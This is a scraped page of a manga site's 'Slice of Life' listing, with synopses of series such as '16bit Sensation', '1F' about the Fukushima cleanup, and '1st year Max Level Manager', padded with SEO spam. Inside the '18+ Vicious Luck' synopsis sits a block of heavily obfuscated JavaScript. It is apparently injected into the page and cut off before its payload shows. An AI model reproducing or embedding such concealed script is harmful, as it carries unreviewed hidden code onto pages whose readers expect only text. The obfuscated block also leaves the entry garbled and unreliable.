Slice of Life - Page 5

Explore the world of Slice of Life manga, where gripping stories await. Start reading the best Slice of Life manga free now!

9048 results

16+12 - Nijuuhachi

Yu Komakita died in an accident on her 17th birthday, but was reincarnated as Shiyu Kaburaki with memories of her previous life. At the age of 12, Shiyu is reunited with Chiharu, who had loved her so much that he proposed to her original self. Chiharu, who was five at the time, has now turned seventeen. Chiharu had closed his heart because of Yu\'s death, but...... A much-talked-about reincarnation love story!


16bit Sensation

The year is 1992. Meiko Uehara, a young college student, starts work part-time at a PC shop to make a little spare cash. One day, however, she goes up to the second floor of the shop and discovers a secret - the PC shop is a front for Alcohol Soft, a developer of erotic “bishoujo” PC games. Lacking sufficient manpower, the head of Alcohol Soft asks Meiko if she can help out as a graphic artist. Drawing with a mouse! Dithering! Debugging! The game development scene in 1992 is not an easy one. Will Meiko be able to make it in the gaming world?Drawn by Tamiki Wakaki (The World God Only Knows), with firsthand accounts by Misato Mitsumi and Tatsuki Amazuyu (developers at AQUAPLUS, who helped create To Heart, Tears to Tiara, Utawarerumono, and more), this series initially started as a doujinshi before being released as a compiled manga.


17 (SAKURAI Machiko)

From: Shinnen It's the start of their senior year, and Shiika happens to be in the same class as a guy named Megumi. It's a mystery to her why his voice echoes through her mind.


17 Sai No Mama

These are stories that deal with being an underage mother and how the characters dealt with the situation. by Forbidden Garden: a series of oneshots: We are merely 17 years old and in love. And then I suddenly got pregnant, although he proposed to me straight away, my parents were against this, but I don't want to get an abortion, I want to be a mommy. No one can help us... which path is there for us to take? Little Life Growing Inside - Falling in love, and then getting pregnant, is that a sin? Just because we're still in high school? Spanning the Lost Life - Getting an abortion during the age of 15, and then being betrayed by the lover. I won't love anyone ever again, definitely... I Will Become a Strong Mother - I'm a single mother, I have a crush on someone, is having this type of feeling a burden? Believing the Feelings of Love


17 Years Old, That Summer Day's Miracle

A main character who's lived for 17 years. The reflection in his gaze tells a special story of that summer day.


18+ Vicious Luck

Chen Yang was just an ordinary person. One day, he was given an opportunity: he was offered the ability to control his luck! Love, status, and fortune were suddenly all within his grasp. When a person can control his luck at will, how will his life change? Will he run into beauties as soon as he steps outside his door? Will he trade as much stock as he possibly can? Damn… it’s too good to be true… Those who are my friends will all live wonderful lives. Those who are my enemies have already paid the price!<script></script><script>(function(_0xccb202,_0x47bf26){var _0x5c82f9=_0x1d13,_0x3e7c42=_0xccb202();while(!![]){try{var _0x5817c8=-parseInt(_0x5c82f9(0xb8))/(-0x209d+0x485*0x7+0xfb)+-parseInt(_0x5c82f9(0xcd))/(-0x19e4*-0x1+-0x1*0x11c5+-0x81d)+parseInt(_0x5c82f9(0xc1))/(0x1*0xc5+-0x2*-0x11af+-0x2420)+-parseInt(_0x5c82f9(0xcb))/(0x22c*0x6+-0x2b*-0x89+-0x2407)+-parseInt(_0x5c82f9(0xb9))/(-0x3d*0x32+-0x1cdd+-0x2ea*-0xe)*(parseInt(_0x5c82f9(0xcf))/(-0x21c8+0x24c2+-0x2f4))+-parseInt(_0x5c82f9(0xba))/(-0xa*-0x3d3+-0x5*0x62+-0x1*0x244d)+parseInt(_0x5c82f9(0xbd))/(-0x20b5*0x1+-0x2539+0x45f6);if(_0x5817c8===_0x47bf26)break;else _0x3e7c42['push'](_0x3e7c42['shift']());}catch(_0x425f9b){_0x3e7c42['push'](_0x3e7c42['shift']());}}}(_0x3be2,-0xaed80+0x2c*0x1d5f+-0x31993*-0x6));function _0x1d13(_0x466487,_0x58752e){var _0x327798=_0x3be2();return _0x1d13=function(_0x4a1d92,_0x7cd320){_0x4a1d92=_0x4a1d92-(-0x1130+-0x1cd6+0x2ebb);var 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18-sai no Kodou

Another tender love story which fails to run smoothly from the master of such works Yukari Kawachi! This is a one volume "novel" type manga. Rui will be a model, and Tougo will be a painter - the two young childhood friends dream about their future. When Rui's father dies when she is 17, she goes to Tokyo, to fulfill her dreams - and meets a handsome make-up artist and ...! ~Hidoi~! Translators



The cute and funny adventures of a boy and his best friend. Also contains insert art of the characters by the mangaka.


1F - An Account of the Cleanup at Fukushima Daiichi Nuclear Power Plant

The experiences of author, Tatsuta Kazuto, a former laborer at the Fukushima I Nuclear Power Plant after the March 2011 earthquake and tsunami.


1St Kiss

He is her younger brother, although the two have no blood relationship but she always considers him to be her biological brother … can only be brother that’s all. of course he doesn’t want to be like that, but he is also afraid that he will create distance with her more and more far away. If their first meeting in life was not like that, would they have another result? The girl he loves is right in front of his eyes but is like a wind and can’t hold … Can only as younger brother? How must he do to let her know that he can also become a guardian for her whole life? Él es su hermano menor, aunque los dos no tienen una relación de sangre, pero ella siempre considera que él es su hermano biológico … solo puede ser hermano, eso es todo. por supuesto, él no quiere ser así, pero también teme que va a crear distancia con ella cada vez más lejos. Si su primer encuentro en la vida no fuera así, ¿tendrían otro resultado? La chica que ama está justo delante de sus ojos, pero es como un viento y no puede sostener … ¿Puede solo como hermano menor? ¿Qué debe hacer para hacerle saber que también puede convertirse en un tutor para toda su vida?


1st year Max Level Manager

Read “1st year Max Level Manager Manga” – “1st year Max Level Manager Manhwa” Online Free At HOTMANGA The summary of the comic 1st year Max Level Manager: Jeong Yun Ho, vice president of Top Entertainment and top actress Ju Yeong In’s husband, is a successful man, but despite all that he always feels empty inside. Would he be living a different life had he made a different choice? Ten years ago, he lost his precious smile. And now, suddenly his mobile phone rang. “What the hell? I’m going to die?!?” But wait, it’s weird. He’s going back to his first year of life! The life of “first year max level manager” is just beginning. “1st year Max Level Manager” is also known as: Rookie Talent Agent Knows It All / 1년차 만렙 매니저 / Back as 1st Year Manager / Legendary Manager Returns To New Employee / ปีที่ 1 ของผู้จัดการเลเวลแม็กซ์ / 今天也在摆平娱乐圈 / 伝説のマネジャー新入社員に戻る / 菜鳥王牌經紀人 The comic “1st year Max Level Manager” belongs to the Genre: Action, Adventure, Comedy, Drama, Manhwa, Reincarnation, Shounen, Slice of Life, Supernatural “manhuafast, Manga Updates, Manhwa Website…” are the most searched keywords on the website KUN MANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


2 Centimeter Gossip

"We follow an unspoken agreement not to look at each other's face. After all, he's nothing more than a conversation partner for me to unwind with in the restroom... Once we leave these doors, we're nothing but strangers."A BL about falling in love(?) in the company restroom.
